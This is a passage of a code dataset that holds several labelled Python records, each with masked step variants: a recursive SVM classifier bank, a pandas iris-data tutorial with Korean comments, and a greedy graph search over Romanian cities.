# Reason for having 10 sigmoid is to get sharper distinction.
def sigmoid_10(x):
return 1 / (1 + math.exp(-10*x))
# Following are required for custom functions Task 1,2
def meanie(x):
return np.mean(x, axis=1)
def dot_with_11(x):
return np.dot(x, np.array([0.5, 0.5]))
if __name__ == '__main__':
learning_phase = False
classifier_file_name = 'ClassifierFile.pkl'
if os.path.isfile(classifier_file_name):
Main_C1 = pickle.load(open(classifier_file_name, 'r'))
else:
Main_C1 = SimpleClassifierBank(max_width=2000, input_width=1500, height=500)
# Learn or not learn?
if learning_phase:
School.class_digital_logic(Main_C1)
School.simple_custom_fitting_class(Main_C1)
# Main_C1.fit_custom_fx(np.mean,input_width=1500, output_width=1, task_name='np.mean')
yp = Main_C1.predict(np.random.randn(8, 22))
print 'Predicted value is ', yp
# Main_C1.remove_classifier('np.mean')
Main_C1.status()
pickle.dump(Main_C1, open(classifier_file_name, 'w'))
|
normal
|
{
"blob_id": "eb043c4c981b48763164e3d060fd52f5032be0ea",
"index": 8996,
"step-1": "\"\"\" Version 3 of IRC (Infinite Recursive classifier). Based on the idea that each output is placed in a certain\nlocation.\nLet me try to solve a simpler problem first. Let me forget about the gate and do non stop recursive classification\nstep by step, one bye one.\n\nUpdate. 19 May 2015. Let me stept this up. Instead of having a fixed width,\n\nUpdate. 21 May 2015: Split into files, created School.py\n\n#TODO: extending classifier\n let me keep expanding the width. Only the\n Variable width output for classifier.\n Assign any function to a classifier node.\ninput width is fixed.\n# TODO Need a better predictor.\n\"\"\"\n\n__author__ = 'Abhishek Rao'\n\n\n# Headers\nimport numpy as np\nfrom sklearn import svm\nimport math\nimport matplotlib.pyplot as plt\nimport pickle\nimport os.path\nfrom sklearn.metrics import accuracy_score\nimport School\n\n\n# Constants\n\n\n# Classes\nclass ClassifierNode:\n \"\"\" A node that contains classifier, it's input address and output address.\n \"\"\"\n\n def __init__(self, end_in_address, out_address, classifier_name='Default',\n given_predictor=None):\n self.out_address = out_address\n self.end_in_address = end_in_address # end column\n self.label = classifier_name # The name of this concept. e.g. like apple etc.\n # Check whether to create a standard classifier or a custom, given one.\n if given_predictor:\n self.given_predictor = given_predictor\n self.classifier_type = 'custom'\n else:\n self.classifier = svm.LinearSVC(dual=False, penalty='l1')\n self.classifier_type = 'standard'\n\n def fit(self, x_in, y):\n new_x_in = x_in[:, :self.end_in_address]\n self.classifier.fit(new_x_in, y)\n\n def predict(self, x_in):\n \"\"\"\n Give output for the current classifier. Note instead of predict 1,0, better to use probability, soft prediction.\n :param x_in: The Classifier banks working memory, full matrix_in.\n :return: A column of predicted values.\n \"\"\"\n new_x_in = x_in[:, :self.end_in_address]\n if self.classifier_type == 'standard':\n dec_fx_in = self.classifier.decision_function(new_x_in)\n else:\n dec_fx_in = self.given_predictor(new_x_in)\n # Convert it into mapping between 0 to 1 instead of -1 to 1\n return np.array([sigmoid_10(i) for i in dec_fx_in])\n\n\nclass SimpleClassifierBank:\n \"\"\" A machine which stores both input X and the current output of bunch of classifiers.\n API should be similar to scikit learn\"\"\"\n\n def __init__(self, max_width, input_width, height):\n \"\"\"\n Initialize this class.\n\n :rtype : object self\n :param max_width: maximum data dimension in current working memory, should be greater than\n input_width.\n :param input_width: maximum input dimension.\n :param height: maximum number of input samples\n :return: None\n \"\"\"\n self.current_working_memory = np.zeros([height, max_width])\n self.classifiers_out_address_start = input_width # the start of classifiers output.\n self.classifiers_current_count = 0 # starting address for output for new classifier\n self.classifiers_list = []\n\n def predict(self, x_pred):\n \"\"\"Give out what it thinks from the input. Input x_pred should be 2 dimensional.\n\n :param: x_pred: input, dimension 2, (samples x_pred dimension)\"\"\"\n self.current_working_memory *= 0 # Flush the current input\n x_pred = np.array(x_pred)\n input_number_samples, input_feature_dimension = x_pred.shape\n if len(x_pred.shape) is not 2:\n print \"Error in predict. 
Input dimension should be 2\"\n raise ValueError\n self.current_working_memory[:input_number_samples, :input_feature_dimension] = x_pred\n for classifier_i in self.classifiers_list:\n predicted_value = classifier_i.predict(self.current_working_memory)\n predicted_shape = predicted_value.shape\n if len(predicted_shape) < 2:\n predicted_value = predicted_value.reshape(-1, 1)\n predicted_shape = predicted_value.shape\n self.current_working_memory[:predicted_shape[0], classifier_i.out_address] = predicted_value\n # need to return the rightmost nonzero column.\n for column_j in range(self.current_working_memory.shape[1])[::-1]: # reverse traverse through columns\n if np.any(self.current_working_memory[:input_number_samples, column_j]):\n soft_dec = self.current_working_memory[:input_number_samples, column_j]\n return np.array(soft_dec > 0.5, dtype=np.int16)\n print 'Cant find any nonzero column'\n return self.current_working_memory[:, 0]\n\n def fit(self, x_in, y, task_name='Default'):\n \"\"\"\n Adds a new classifier and trains it, similar to Scikit API\n\n :param x_in: 2d Input data\n :param y: labels\n :return: None\n \"\"\"\n # check for limit reach for number of classifiers.\n if self.classifiers_current_count + self.classifiers_out_address_start \\\n > self.current_working_memory.shape[1]:\n print 'No more space for classifier. ERROR'\n raise MemoryError\n x_in = np.array(x_in)\n input_number_samples, input_feature_dimension = x_in.shape\n if len(x_in.shape) is not 2:\n print \"Error in predict. Input dimension should be 2\"\n raise ValueError\n self.current_working_memory[:x_in.shape[0], :x_in.shape[1]] = x_in\n # Procure a new classifier, this might be wasteful, later perhaps reuse classifier\n # instead of lavishly getting new ones, chinese restaurant?\n new_classifier = ClassifierNode(\n end_in_address=self.classifiers_out_address_start + self.classifiers_current_count,\n out_address=[self.classifiers_out_address_start + self.classifiers_current_count + 1],\n classifier_name=task_name)\n self.classifiers_current_count += 1\n # Need to take care of mismatch in length of working memory and input samples.\n new_classifier.fit(self.current_working_memory[:input_number_samples], y)\n self.classifiers_list.append(new_classifier)\n\n def fit_custom_fx(self, custom_function, input_width, output_width, task_name):\n \"\"\"\n Push in a new custom function to classifiers list.\n :param custom_function: The function that will be used to predict. Should take in a 2D array input and\n give out a 2d array of same height and variable width.\n :param input_width: The width of input.\n :param output_width: The width of output. If a single neuron this is one.\n :param task_name: name of this function\n :return: None\n \"\"\"\n new_classifier = ClassifierNode(\n end_in_address=input_width,\n out_address=self.classifiers_out_address_start + self.classifiers_current_count + np.arange(output_width),\n classifier_name=task_name,\n given_predictor=custom_function\n )\n self.classifiers_current_count += output_width\n self.classifiers_list.append(new_classifier)\n\n def status(self):\n \"\"\"Gives out the current status, like number of classifier and prints their values\"\"\"\n print 'Currently there are ', len(self.classifiers_list), ' classifiers. 
They are'\n classifiers_coefficients = np.zeros(self.current_working_memory.shape)\n print [classifier_i.label for classifier_i in self.classifiers_list]\n for count, classifier_i in enumerate(self.classifiers_list):\n coeffs_i = classifier_i.classifier.coef_ \\\n if classifier_i.classifier_type == 'standard' else np.zeros([1, 1])\n classifiers_coefficients[count, :coeffs_i.shape[1]] = coeffs_i\n # print 'Classifier: ', classifier_i\n # print 'Classifier name: ', classifier_i.label\n # print 'Out address', classifier_i.out_address\n # print 'In address', classifier_i.end_in_address\n # print 'Coefficients: ', classifier_i.classifier.coef_, classifier_i.classifier.intercept_\n plt.imshow(self.current_working_memory, interpolation='none', cmap='gray')\n plt.title('Current working memory')\n plt.figure()\n plt.imshow(classifiers_coefficients, interpolation='none', cmap='gray')\n plt.title('Classifier coefficients')\n plt.show()\n\n def remove_classifier(self, classifier_name):\n \"\"\"\n Removes the classifier whose name is same as classifier_name\n :param classifier_name: the label of the classifier to be removed.\n :return: the index of removed classifier. -1 if not found.\n \"\"\"\n try:\n labels_list = [classifier_i.label for classifier_i in self.classifiers_list]\n except ValueError:\n print 'The specified label does not exist.'\n return -1\n removing_index = labels_list.index(classifier_name)\n self.classifiers_list.pop(removing_index)\n print 'Classifier was removed. Its nae was', classifier_name\n return removing_index\n\n def score(self, x_in, y):\n \"\"\"\n Gives the accuracy between predicted( x_in) and y\n :param x_in: 2d matrix, samples x_in dimension\n :param y: actual label\n :return: float, between 0 to 1\n \"\"\"\n yp_score = self.predict(x_in)\n return accuracy_score(y, y_pred=yp_score)\n\n def generic_task(self, x_in, y, task_name):\n \"\"\"\n A generic framework to train on different tasks.\n \"\"\"\n self.fit(x_in, y, task_name=task_name)\n print 'The score for task ', task_name, ' is ', self.score(x_in, y)\n\n\n# Global functions\n# Reason for having 10 sigmoid is to get sharper distinction.\ndef sigmoid_10(x):\n return 1 / (1 + math.exp(-10*x))\n\n\n# Following are required for custom functions Task 1,2\ndef meanie(x):\n return np.mean(x, axis=1)\n\n\ndef dot_with_11(x):\n return np.dot(x, np.array([0.5, 0.5]))\n\n\nif __name__ == '__main__':\n learning_phase = False\n classifier_file_name = 'ClassifierFile.pkl'\n if os.path.isfile(classifier_file_name):\n Main_C1 = pickle.load(open(classifier_file_name, 'r'))\n else:\n Main_C1 = SimpleClassifierBank(max_width=2000, input_width=1500, height=500)\n # Learn or not learn?\n if learning_phase:\n School.class_digital_logic(Main_C1)\n School.simple_custom_fitting_class(Main_C1)\n # Main_C1.fit_custom_fx(np.mean,input_width=1500, output_width=1, task_name='np.mean')\n yp = Main_C1.predict(np.random.randn(8, 22))\n print 'Predicted value is ', yp\n # Main_C1.remove_classifier('np.mean')\n\n Main_C1.status()\n pickle.dump(Main_C1, open(classifier_file_name, 'w'))\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
# Library environment
import pandas as pd
import numpy as np
# Load the iris dataset from sklearn's datasets module
from sklearn import datasets
iris = datasets.load_iris()
# The iris dataset is a dictionary, so inspect its keys
'''
print(iris.keys())
print(iris['DESCR'])
print("데이터 셋 크기:", iris['target'])
print("데이터 셋 내용:\n", iris['target'])
'''
# Size of the dataset in the data attribute
print("데이터 셋 크기:", iris['data'].shape)
# Contents of the data attribute (extract the first 7 rows)
data1 = ['a', 'b', 'c', 'd', 'e']
print(type(data1))
sr1 = pd.Series(data1)
# print(type(sr1))
data2 = (1, 2, 3.14, 100, -10)
sr2 = pd.Series(data2)
dict_data = {'c1':data1, 'c2':data2}
df = pd.DataFrame(dict_data)
print(df)
# Rename the columns and the row index
df.columns = ['string1', 'string2']
df.index = ['r1', 'r2', 'r3', 'r4', 'r5']
# print(df.loc['r2':'r4', 'string1':'string2'])
print('데이터셋 내용:\n', iris['data'][:7, :])
df = pd.DataFrame(iris['data'], columns=iris['feature_names'])
print('데이터 프레임의 형태:', df.shape)
df.columns = ['sepal_length', 'sepal_width', 'petal_length', 'petal_width']
print(df.head(2))
df['Target'] = iris['target']
print(df.head())
x = [2, 1, 13, 4, 15, 26]
y = [0, 4, 31, 2, 42, 54]
df = pd.DataFrame({'X':x, 'Y':y})
print(df)
|
normal
|
{
"blob_id": "dc2c9293040204f0ec2156c41b8be624f4e5cf99",
"index": 8389,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint('데이터 셋 크기:', iris['data'].shape)\n<mask token>\nprint(type(data1))\n<mask token>\nprint(df)\n<mask token>\nprint('데이터셋 내용:\\n', iris['data'][:7, :])\n<mask token>\nprint('데이터 프레임의 형태:', df.shape)\n<mask token>\nprint(df.head(2))\n<mask token>\nprint(df.head())\n<mask token>\nprint(df)\n",
"step-3": "<mask token>\niris = datasets.load_iris()\n<mask token>\nprint('데이터 셋 크기:', iris['data'].shape)\ndata1 = ['a', 'b', 'c', 'd', 'e']\nprint(type(data1))\nsr1 = pd.Series(data1)\ndata2 = 1, 2, 3.14, 100, -10\nsr2 = pd.Series(data2)\ndict_data = {'c1': data1, 'c2': data2}\ndf = pd.DataFrame(dict_data)\nprint(df)\ndf.columns = ['string1', 'string2']\ndf.index = ['r1', 'r2', 'r3', 'r4', 'r5']\nprint('데이터셋 내용:\\n', iris['data'][:7, :])\ndf = pd.DataFrame(iris['data'], columns=iris['feature_names'])\nprint('데이터 프레임의 형태:', df.shape)\ndf.columns = ['sepal_length', 'sepal_width', 'petal_length', 'petal_width']\nprint(df.head(2))\ndf['Target'] = iris['target']\nprint(df.head())\nx = [2, 1, 13, 4, 15, 26]\ny = [0, 4, 31, 2, 42, 54]\ndf = pd.DataFrame({'X': x, 'Y': y})\nprint(df)\n",
"step-4": "import pandas as pd\nimport numpy as np\nfrom sklearn import datasets\niris = datasets.load_iris()\n<mask token>\nprint('데이터 셋 크기:', iris['data'].shape)\ndata1 = ['a', 'b', 'c', 'd', 'e']\nprint(type(data1))\nsr1 = pd.Series(data1)\ndata2 = 1, 2, 3.14, 100, -10\nsr2 = pd.Series(data2)\ndict_data = {'c1': data1, 'c2': data2}\ndf = pd.DataFrame(dict_data)\nprint(df)\ndf.columns = ['string1', 'string2']\ndf.index = ['r1', 'r2', 'r3', 'r4', 'r5']\nprint('데이터셋 내용:\\n', iris['data'][:7, :])\ndf = pd.DataFrame(iris['data'], columns=iris['feature_names'])\nprint('데이터 프레임의 형태:', df.shape)\ndf.columns = ['sepal_length', 'sepal_width', 'petal_length', 'petal_width']\nprint(df.head(2))\ndf['Target'] = iris['target']\nprint(df.head())\nx = [2, 1, 13, 4, 15, 26]\ny = [0, 4, 31, 2, 42, 54]\ndf = pd.DataFrame({'X': x, 'Y': y})\nprint(df)\n",
"step-5": "# 라이브러리 환경\nimport pandas as pd\nimport numpy as np\n\n# sklearn 테이터셋에서 iris 데이터셋 로딩\nfrom sklearn import datasets\niris = datasets.load_iris()\n\n# iris 데이터셋은 딕셔너리 형태이므로, key 값 확인\n'''\nprint(iris.keys())\nprint(iris['DESCR'])\nprint(\"데이터 셋 크기:\", iris['target'])\nprint(\"데이터 셋 내용:\\n\", iris['target'])\n'''\n\n# data 속성의 데이터셋 크기\nprint(\"데이터 셋 크기:\", iris['data'].shape)\n\n# data 속성의 데이터셋 내용(첫 7개 행 추출)\ndata1 = ['a', 'b', 'c', 'd', 'e']\nprint(type(data1))\nsr1 = pd.Series(data1)\n# print(type(sr1))\ndata2 = (1, 2, 3.14, 100, -10)\nsr2 = pd.Series(data2)\n\ndict_data = {'c1':data1, 'c2':data2}\ndf = pd.DataFrame(dict_data)\nprint(df)\n\n\n# 열(columns)과 행(index)이름 바꾸기\ndf.columns = ['string1', 'string2']\ndf.index = ['r1', 'r2', 'r3', 'r4', 'r5']\n\n# print(df.loc['r2':'r4', 'string1':'string2'])\n\nprint('데이터셋 내용:\\n', iris['data'][:7, :])\ndf = pd.DataFrame(iris['data'], columns=iris['feature_names'])\n\nprint('데이터 프레임의 형태:', df.shape)\ndf.columns = ['sepal_length', 'sepal_width', 'petal_length', 'petal_width']\nprint(df.head(2))\n\ndf['Target'] = iris['target']\nprint(df.head())\n\nx = [2, 1, 13, 4, 15, 26]\ny = [0, 4, 31, 2, 42, 54]\n\ndf = pd.DataFrame({'X':x, 'Y':y})\nprint(df)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import numpy as np
from StudyCaseUdemy.Graph import Graph
class OrderVector:
def __init__(self, size):
self.size = size
self.last_pos = -1
self.values = np.empty(self.size, dtype=object)
def insert(self, vertex):
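        # Keep self.values sorted by distance: find the first entry larger than the new vertex, shift the tail one slot right, insert at that position.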
if self.last_pos == self.size - 1:
print('Capacidad max do Vector atingida')
return
pos = 0
for i in range(self.last_pos+1):
pos = i
temp = self.values[i]
if self.values[i].distance > vertex.distance:
break
if i == self.last_pos:
pos = i + 1
x = self.last_pos
while x >= pos:
self.values[x + 1] = self.values[x]
x -= 1
self.values[pos] = vertex
self.last_pos += 1
def printer(self):
if self.last_pos == -1:
print('Empty Array')
else:
for i in range(self.last_pos+1):
print(i, ' - ', self.values[i].label, ' - ', self.values[i].distance)
class Greedy:
def __init__(self, objective):
self.objective = objective
self.found = False
def search(self, current):
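        # Greedy search: mark the current vertex, stop if it is the objective, otherwise order unvisited neighbours by distance and recurse into the closest one.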
print('------')
print('Current Vertex: {}'.format(current.label))
current.visited = True
if current == self.objective:
self.found = True
else:
orderVector = OrderVector(len(current.adjacents))
for adj in current.adjacents:
if not adj.vertex.visited:
adj.vertex.visited = True
orderVector.insert(adj.vertex)
orderVector.printer()
if orderVector.values[0] is not None:
self.search(orderVector.values[0])
grafo = Graph()
# vector = OrderVector(5)
# vector.insert(grafo.arad)
# vector.insert(grafo.craiova)
# vector.insert(grafo.bucharest)
# vector.insert(grafo.dobreta)
# vector.insert(grafo.lugoj)
# vector.printer()
greedy = Greedy(grafo.bucharest)
greedy.search(grafo.arad)
|
normal
|
{
"blob_id": "87291d066b94aca1d94cbe5d9281fc72da1b0c35",
"index": 9483,
"step-1": "<mask token>\n\n\nclass OrderVector:\n <mask token>\n\n def insert(self, vertex):\n if self.last_pos == self.size - 1:\n print('Capacidad max do Vector atingida')\n return\n pos = 0\n for i in range(self.last_pos + 1):\n pos = i\n temp = self.values[i]\n if self.values[i].distance > vertex.distance:\n break\n if i == self.last_pos:\n pos = i + 1\n x = self.last_pos\n while x >= pos:\n self.values[x + 1] = self.values[x]\n x -= 1\n self.values[pos] = vertex\n self.last_pos += 1\n\n def printer(self):\n if self.last_pos == -1:\n print('Empty Array')\n else:\n for i in range(self.last_pos + 1):\n print(i, ' - ', self.values[i].label, ' - ', self.values[i]\n .distance)\n\n\nclass Greedy:\n\n def __init__(self, objective):\n self.objective = objective\n self.found = False\n\n def search(self, current):\n print('------')\n print('Current Vertex: {}'.format(current.label))\n current.visited = True\n if current == self.objective:\n self.found = True\n else:\n orderVector = OrderVector(len(current.adjacents))\n for adj in current.adjacents:\n if not adj.vertex.visited:\n adj.vertex.visited = True\n orderVector.insert(adj.vertex)\n orderVector.printer()\n if orderVector.values[0] is not None:\n self.search(orderVector.values[0])\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass OrderVector:\n\n def __init__(self, size):\n self.size = size\n self.last_pos = -1\n self.values = np.empty(self.size, dtype=object)\n\n def insert(self, vertex):\n if self.last_pos == self.size - 1:\n print('Capacidad max do Vector atingida')\n return\n pos = 0\n for i in range(self.last_pos + 1):\n pos = i\n temp = self.values[i]\n if self.values[i].distance > vertex.distance:\n break\n if i == self.last_pos:\n pos = i + 1\n x = self.last_pos\n while x >= pos:\n self.values[x + 1] = self.values[x]\n x -= 1\n self.values[pos] = vertex\n self.last_pos += 1\n\n def printer(self):\n if self.last_pos == -1:\n print('Empty Array')\n else:\n for i in range(self.last_pos + 1):\n print(i, ' - ', self.values[i].label, ' - ', self.values[i]\n .distance)\n\n\nclass Greedy:\n\n def __init__(self, objective):\n self.objective = objective\n self.found = False\n\n def search(self, current):\n print('------')\n print('Current Vertex: {}'.format(current.label))\n current.visited = True\n if current == self.objective:\n self.found = True\n else:\n orderVector = OrderVector(len(current.adjacents))\n for adj in current.adjacents:\n if not adj.vertex.visited:\n adj.vertex.visited = True\n orderVector.insert(adj.vertex)\n orderVector.printer()\n if orderVector.values[0] is not None:\n self.search(orderVector.values[0])\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass OrderVector:\n\n def __init__(self, size):\n self.size = size\n self.last_pos = -1\n self.values = np.empty(self.size, dtype=object)\n\n def insert(self, vertex):\n if self.last_pos == self.size - 1:\n print('Capacidad max do Vector atingida')\n return\n pos = 0\n for i in range(self.last_pos + 1):\n pos = i\n temp = self.values[i]\n if self.values[i].distance > vertex.distance:\n break\n if i == self.last_pos:\n pos = i + 1\n x = self.last_pos\n while x >= pos:\n self.values[x + 1] = self.values[x]\n x -= 1\n self.values[pos] = vertex\n self.last_pos += 1\n\n def printer(self):\n if self.last_pos == -1:\n print('Empty Array')\n else:\n for i in range(self.last_pos + 1):\n print(i, ' - ', self.values[i].label, ' - ', self.values[i]\n .distance)\n\n\nclass Greedy:\n\n def __init__(self, objective):\n self.objective = objective\n self.found = False\n\n def search(self, current):\n print('------')\n print('Current Vertex: {}'.format(current.label))\n current.visited = True\n if current == self.objective:\n self.found = True\n else:\n orderVector = OrderVector(len(current.adjacents))\n for adj in current.adjacents:\n if not adj.vertex.visited:\n adj.vertex.visited = True\n orderVector.insert(adj.vertex)\n orderVector.printer()\n if orderVector.values[0] is not None:\n self.search(orderVector.values[0])\n\n\ngrafo = Graph()\ngreedy = Greedy(grafo.bucharest)\ngreedy.search(grafo.arad)\n",
"step-4": "import numpy as np\nfrom StudyCaseUdemy.Graph import Graph\n\n\nclass OrderVector:\n\n def __init__(self, size):\n self.size = size\n self.last_pos = -1\n self.values = np.empty(self.size, dtype=object)\n\n def insert(self, vertex):\n if self.last_pos == self.size - 1:\n print('Capacidad max do Vector atingida')\n return\n pos = 0\n for i in range(self.last_pos + 1):\n pos = i\n temp = self.values[i]\n if self.values[i].distance > vertex.distance:\n break\n if i == self.last_pos:\n pos = i + 1\n x = self.last_pos\n while x >= pos:\n self.values[x + 1] = self.values[x]\n x -= 1\n self.values[pos] = vertex\n self.last_pos += 1\n\n def printer(self):\n if self.last_pos == -1:\n print('Empty Array')\n else:\n for i in range(self.last_pos + 1):\n print(i, ' - ', self.values[i].label, ' - ', self.values[i]\n .distance)\n\n\nclass Greedy:\n\n def __init__(self, objective):\n self.objective = objective\n self.found = False\n\n def search(self, current):\n print('------')\n print('Current Vertex: {}'.format(current.label))\n current.visited = True\n if current == self.objective:\n self.found = True\n else:\n orderVector = OrderVector(len(current.adjacents))\n for adj in current.adjacents:\n if not adj.vertex.visited:\n adj.vertex.visited = True\n orderVector.insert(adj.vertex)\n orderVector.printer()\n if orderVector.values[0] is not None:\n self.search(orderVector.values[0])\n\n\ngrafo = Graph()\ngreedy = Greedy(grafo.bucharest)\ngreedy.search(grafo.arad)\n",
"step-5": "import numpy as np\nfrom StudyCaseUdemy.Graph import Graph\n\nclass OrderVector:\n def __init__(self, size):\n self.size = size\n self.last_pos = -1\n self.values = np.empty(self.size, dtype=object)\n\n def insert(self, vertex):\n if self.last_pos == self.size - 1:\n print('Capacidad max do Vector atingida')\n return\n pos = 0\n for i in range(self.last_pos+1):\n pos = i\n temp = self.values[i]\n if self.values[i].distance > vertex.distance:\n break\n if i == self.last_pos:\n pos = i + 1\n x = self.last_pos\n while x >= pos:\n self.values[x + 1] = self.values[x]\n x -= 1\n self.values[pos] = vertex\n self.last_pos += 1\n\n def printer(self):\n if self.last_pos == -1:\n print('Empty Array')\n else:\n for i in range(self.last_pos+1):\n print(i, ' - ', self.values[i].label, ' - ', self.values[i].distance)\n\n\nclass Greedy:\n def __init__(self, objective):\n self.objective = objective\n self.found = False\n\n def search(self, current):\n print('------')\n print('Current Vertex: {}'.format(current.label))\n current.visited = True\n if current == self.objective:\n self.found = True\n\n else:\n orderVector = OrderVector(len(current.adjacents))\n for adj in current.adjacents:\n if not adj.vertex.visited:\n adj.vertex.visited = True\n orderVector.insert(adj.vertex)\n orderVector.printer()\n if orderVector.values[0] is not None:\n self.search(orderVector.values[0])\n\n\n\ngrafo = Graph()\n# vector = OrderVector(5)\n# vector.insert(grafo.arad)\n# vector.insert(grafo.craiova)\n# vector.insert(grafo.bucharest)\n# vector.insert(grafo.dobreta)\n# vector.insert(grafo.lugoj)\n\n\n# vector.printer()\ngreedy = Greedy(grafo.bucharest)\ngreedy.search(grafo.arad)\n",
"step-ids": [
6,
7,
9,
10,
11
]
}
|
[
6,
7,
9,
10,
11
] |